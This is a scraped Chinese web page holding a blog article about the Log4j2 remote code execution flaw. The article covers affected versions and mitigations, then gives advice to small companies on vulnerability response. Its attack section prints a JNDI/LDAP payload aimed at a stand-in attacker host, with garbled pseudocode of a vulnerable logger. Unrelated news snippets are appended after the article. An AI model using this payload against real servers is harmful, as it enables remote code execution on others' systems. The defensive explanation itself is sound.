专栏电商日志财经减肥爱情
投稿投诉
爱情常识
搭配分娩
减肥两性
孕期塑形
财经教案
论文美文
日志体育
养生学堂
电商科学
头戴业界
专栏星座
用品音乐

Log4j史诗级漏洞,我们这些小公司能做些什么?

  事件背景
  12月10日,看到朋友圈中已经有人在通宵修改、上线系统了。随即,又看到阿里云安全、腾讯安全部门发出的官方报告:ApacheLog4j2存在远程代码执行漏洞,且漏洞已对外公开。
  看到相关消息,马上爬起来把所有项目的日志系统过滤一遍,还好老项目采用的log4j,新项目采用的logback,没有中招。随后就看到朋友圈铺天盖地的相关消息。
  作为一个史诗级的事件,紧急修改漏洞是必然的。作为程序员,如果看到这则消息,连去核查一下系统都做不到,那真的不是一个合格的程序员。
  经历过这次事件,不仅是看热闹而已,还要思考一下,作为小公司如何避免、提前预防、做好准备应对这类Bug。漏洞描述
  ApacheLog4j2是一款优秀的Java日志框架,与Logback平分秋色,大量主流的开源框架采用了Log4j2,像ApacheStruts2、ApacheSolr、ApacheDruid、ApacheFlink等均受影响。所以,这样一个底层框架出现问题,影响面可想而知。
  漏洞信息:ApacheLog4j2。15。0rc1版本存在漏洞绕过,需及时更新至ApacheLog4j2。15。0rc2版本。
  影响范围:2。0Apachelog4j22。14。1。
  最新修复版本:https:github。comapachelogginglog4j2releasestaglog4j2。15。0rc2补救方案
  方案一:升级版本,发布系统;
  方案二:临时补救:修改JVM参数,设置Dlog4j2。formatMsgNoLookupstrue。在涉及漏洞的项目的类路径(classpath)下增加log4j2。component。properties配置文件并增加配置项log4j2。formatMsgNoLookupstrue。将系统环境变量FORMATMESSAGESPATTERNDISABLELOOKUPS设置为true。攻击原理
  攻击伪代码示例:importorg。apache。log4j。Logger;importjava。io。;importjava。sql。SQLException;importjava。util。;publicclassVulnerableLog4jExampleHandlerimplementsHttpHandler{staticLoggerlogLogger。getLogger(log4jExample。class。getName());示例伪代码:一个简单的HTTP端点,其中读取UserAgent信息并进行ahrefhttps:www。bs178。comrizhitargetblankclassinfotextkey日志a记录;publicvoidhandle(HttpExchangehe)throwsIOException{获取useragent信息StringuserAgenthe。getRequestHeader(useragent);此行记录ahrefhttps:www。bs178。comrizhitargetblankclassinfotextkey日志a的代码,通过记录攻击者控制的HTTP用户代理标头来触发RCE。攻击者可以设置他们的UserAgentheader到{jndi:ldap:attacker。coma}log。info(RequestUserAgent:userAgent);Stringresponseh1HelloThere,userAgent!h1;he。sendResponseHeaders(200,response。length());OutputStreamoshe。getResponseBody();os。write(response。getBytes());os。close();}}
  基于上述代码的基本攻击步骤:请求对应的HTTP端点(或接口),在请求信息中携带攻击代码(比如,在useragent中携带{jndi:ldap:attacker。coma});服务器在通过Log4j2执行日志记录时,记录中包含了基于JNDI和LDAP的恶意负载{jndi:ldap:attacker。coma},其中attacker。com是攻击者控制的地址。记录日志操作触发向攻击者控制的地址发送请求。对应请求返回在响应中返回可执行的恶意代码,注入到服务器进程当中。比如返回,https:attacker。comAttack。class。进而执行脚本控制服务器。
  腾讯安全专家的回复现如下:
  log4j2漏洞复现小公司程序员能做些什么?
  关于漏洞及解决方案,上面已经详细聊了,问题基本得以解决。在大的互联网企业,是有专门的安全运维部门来监控、扫描这些漏洞的。但在小公司,很显然没有这样的条件。
  那么,我们该怎么办?同时,作为事件的经历者,你是否思考过这个事件中反映出的一些其他问题吗?第一,是否第一时间得到消息?
  在大企业,一旦发现这样的漏洞,安全部门会第一时间进行通知。但在小企业,没有安全部门,你是如何获取到漏洞的消息的呢?
  比如我所在的企业,是没有安全部门的,但也几乎是第一时间得知漏洞消息,进行系统排查的。
  作为程序员,如果漏洞消息已经爆出很久,你却一无所知,那就应该反思一下朋友圈的质量以及对技术热点的关注度问题了。
  如何获得圈内第一手消息,取决于也反映着你在社交圈或技术圈所处的位置与现状。第二,是否置若罔闻?
  很多朋友可能也看到了这则漏洞消息,但也就是看一下热闹,然后该干嘛干嘛了,系统有漏洞就有漏洞了呗
  如果你是如此,或者你的团队是如此,你真的需要反省一下职业素养问题了。
  很多人可能觉得自己很牛,觉得自己怀才不遇,觉得工资收入低,觉得被亏待那么,对照一下对这件事所作出的反应,基本就知道自己是不是被亏待了。第三,如何应对突发事件?
  这样的突发事件,也是对系统运维、团队管理的一个考验,也是一个仿真练习:大家都正在进行着当前业务的开发,有一个突发Bug要修改,改一半的代码如何操作?如大面积发布?
  第一,改一半的代码怎么办?如果你的团队的代码开发都是基于master(主干)进行开发、提交代码,针对这样的突发事件,必然会面对改了一半的代码,提交了,想一起发布但还没测试,这种骑虎难下的局面。
  所以,代码的管理(如何打分支、合并分支、分支与主干代码不同环境的发布)必须得从日常的点滴做起,当突发事件发生时,也不至于手忙脚乱。
  第二,有大量项目需要发布怎么办?当然,最古老的方式就是一个系统一个系统手动发布。如果是微服务及应用较多,不仅容易出现错误,而且耗时较长。这就提醒我们,构建自动化发布流程的重要性。第四,怎么找出系统漏洞?
  有安全部门的公司,会定期扫描系统漏洞,那么没有安全部门的公司只能坐以待毙吗?
  其实,还是有一些方法可以发现系统的一些漏洞的。比如,勤关注使用框架的版本升级、利用三方提供的漏洞扫描(比如阿里云服务器的安全扫描)、与同行交流等手段。小结
  任何一个漏洞对软件系统来说都有可能是致命的,也是需要我们谨慎对待的。对于漏洞的处理及做出的反应也是从业者职业素养的体现。
  而如果能从一次次突发事件中学习、思考到更多内容,你将比别人更快地成长。

原神金句游戏人的极致浪漫1hr璃月的夜色,千年的灯火。只有我知道,将要升起的星辰,千年前并不是这副模样只有我记得,琉璃百合的露水几点出现,又在几点消失。十万六千三百二十七次心跳,是我距离上次合眼睡觉的时间文章大鱼大肉(四)你从没吃过的芋头香肠2023hr每年的年猪饭,我都想换着法的给大家看我们云南人储存肉的智慧。云南的农村大多都在山里,以前交通不便,难得上一次街,山高路远的,一年四季吃不上几顿新鲜肉,日常荤腥的来源就是陪伴我高中三年的浪漫与鼓舞1。希君生羽翼,一化北溟鱼。2。你为什么要努力?因为想去的地方很远,想要的东西很贵,喜欢的人很优秀。父母的白发,外界的质疑,以及天生傲骨。3。因为我还年轻,我有年轻的骨骼,我有能够消费回暖看烟火气里透出经济韧性底色视频加载中央视网消息商户的信心来自持续回暖的消费市场,来自不断优化的疫情防控政策,也来自各地促消费的切实举措。这段时间,全国发出数亿消费券,餐饮商超景区有序恢复经营,客流回归,消费生产订单排到6月,佛山企业抢跑招工季广西贺州昭平,佛山企业格兰仕的招聘人员正紧锣密鼓地筹备布展,他们已报名当地2月1日至3日三场现场招聘会。旧岁新年交替之际,是谋定新一年发展战略的关键期。按往年情况看,伴随产能复苏和1478亿!2022年四大运营商政企市场发展战报本分析报告基于中移网罗天下平台数据,对中国移动中国联通中国电信中国广电四大运营商的市场情况进行研究分析。分析对象中国移动中国联通中国电信中国广电集团公司及其各分公司和专业子公司时间淮安移动5G让企业效能提质增效5G线路已提前铺设完成,集成设备到货后就可以立刻安装和调试,预计春节后投产。在江苏百斯特鲜食有限公司新引进的两条流程线设备车间中,淮安移动的施工人员正在为5G网络集成应用平台进行施邱慈观ESG是为了让企业以更符合社会标准的方式盈利随着ESG受到全球投资者的重视,不少企业开展了ESG实践。但在上海交通大学上海高级金融学院(SAIF)的教授邱慈观看来,目前企业的ESG披露虽然比以前进步,但仍然有很大的进步空间。莫拉塔报平安妻子已离开重症监护室,现在情况良好直播吧1月12日讯莫拉塔昨夜在Instagram发文报平安,表示自己的妻子已离开重症监护室。莫拉塔的妻子爱丽丝日前诞下两人之间的第四个孩子贝拉,但因产后并发症进入重症监护室,昨夜莫英超本赛季门将扑出禁区内射门次数排名皮克福德45次登顶知名数据网站Squawka统计了本赛季英超联赛的扑出禁区内射门次数排名,其中埃弗顿门将皮克福德以45次占据榜首。他面对禁区内射门的扑救成功率达到了76。3,同样冠绝英超群雄。该榜单轻松hold住整个秋冬穿搭,就靠它了最近在后台看到有小仙女问有哪一款鞋子可以适配各种风格,轻松hold住一整个秋冬的穿搭?小胖妞的回答是马丁靴!马丁靴,最早是医生为了保护病人受伤部位顺利康复而发明的鞋子,因为好穿耐造
泰山之巅现雾凇奇观,开启仙境模式10月4日,泰山之巅现雾凇奇观,冰雕玉砌晶莹闪烁的雾凇缀满枝头,一树树一丛丛,甚是好看。雷杰摄浓霜中夜零,千林成雾凇。10月4日,泰山之巅现雾凇奇观,冰雕玉砌晶莹闪烁的雾凇缀满枝头55岁港星现身广州农村,在水稻田间跳舞太兴奋,称打从心里笑出来10月5日,港星刘玉翠在个人社交账号上分享了一段视频,并配文称,向往田园生活,简单怡人,打从心里笑出来。曝光的画面中,刘玉翠现身广州某农村,她身后种满了水稻,一片绿油油,再配上蓝天6位当红出国的明星,大都高开低走,有人回国挣钱有人落魄端盘子文阅栀编辑阅栀国外的月亮比较圆。这不是调侃,也不是讽刺,而是很多人内心的真实想法。当出国潮火起来的时候,不少抛弃故土,到国外镀金。其中包括一些当红的演员艺人。不仅有荧幕上的当家花旦导演陈凯歌为何没娶倪萍?为何三次结婚爱过五个女人电影长津湖2021年总票房达57。75亿元,目前是我国电影史上的票房天花板。该片由陈凯歌,徐克林超贤三人执导。电影很精彩,导演有才华,有才华的导演自然会吸引到有才华的女人,今天我们给2022年最美的10位国剧女演员排个名,袁泉第10,秦岚第2头条创作挑战赛2022年,国剧好多美人。问题是,何为美人?是一茬茬工业化流水线培育出的女团成员,在舞台上闪耀着大长腿,跳着凳子舞,摆出让人浮想联翩的姿态,是美人?还是直播间里的女主格斗游戏皮肤中隐藏的玄机,不仅仅是换一个颜色那么简单最初的格斗游戏,似乎并不需要什么颜色区分,因为主角就只有1个,连对战的模式都没有。一直到了街头霸王1时期终于可以双人对战了,为了区分1P和2P,CAPCOM专门安排了一个日本格斗家护肤品让皮肤刺痛的原因找到了,看看你的化妆品有没有这些成分刚开始使用护肤品,皮肤感到刺痛,过一会儿刺痛消失,很多小伙伴都会遇到过这种情况。看到很多的解释刺痛是因为皮肤太干。这种说法到底靠不靠谱?引起皮肤刺痛的真正原因是什么呢?皮肤为什么会KPL封面观察挑杯决赛再现巅峰对决顶级强队交手胜负只在毫厘之间封面新闻记者蔡世奇10月6日晚,2022王者荣耀挑战者杯落幕,武汉eStarPro和北京WB战至巅峰对决,最终两队选出的阵容仅打野不同,武汉eStarPro凭借更强的团队配合和选手快放开那个女孩!UFC拳手李景亮紧紧搂住闫晓楠不放,眼神宠溺近日,34岁的中国UFC拳手嘎子李景亮通过社交平台分享了一段1分多钟的视频,视频中李景亮对着镜头公开警告网络喷子别整天瞎BB,李景亮毫不掩饰地喷子的蔑视感,因为他已经受够了喷子对他想胜人一筹,先低人一等老子说知其雄,守其雌。意思是知道什么是刚强,却谨守着柔弱。老子又说知其荣,守其辱。也就是说,知道什么是荣耀,却谨守着屈辱。老子这两句话,值得那些生活在社会底层却胸怀大志的创业者用来有些感情,不该爱,不能爱今生,有些人,注定不能爱,也不该去爱有些情,千万不能动,保持距离就是自爱。爱上了不该爱的人,你会心中满是伤痕,因为犯了不该犯的错,你心中只能留下遗憾和后悔,所以,人生路上,对待感情
友情链接:快好找快生活快百科快传网中准网文好找聚热点快软网